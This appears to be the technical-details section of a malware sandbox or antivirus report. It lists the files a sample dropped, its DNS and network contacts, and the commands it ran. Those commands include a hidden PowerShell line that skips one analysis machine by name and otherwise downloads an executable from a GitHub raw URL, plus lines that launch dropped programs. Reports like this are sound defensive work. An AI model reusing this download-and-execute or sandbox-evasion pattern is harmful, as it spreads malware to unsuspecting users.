Technical Information
- %TEMP%\7zipsfx.000\gpzaoglz.rt
- %TEMP%\7zipsfx.000\utfstbb.rt
- 'microsoft.com':80
- 'ra#.####ubusercontent.com':443
- DNS ASK microsoft.com
- DNS ASK ra#.####ubusercontent.com
- '%WINDIR%\syswow64\cmd.exe' /c echo Mow' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -command If ($env:computername -eq 'DESKTOP-QO5QU33') {exit}; Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/igkiu/p1/main/old.exe,https:...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start hTbbFEaCbequeq.exe & start nnETwMIWYisS.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo Mow
- '%WINDIR%\syswow64\cmd.exe' /c powershell -command If ($env:computername -eq 'DESKTOP-QO5QU33') {exit}; Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/igkiu/p1/main/old.exe,https:...
- '%WINDIR%\syswow64\cmd.exe' /c start hTbbFEaCbequeq.exe & start nnETwMIWYisS.exe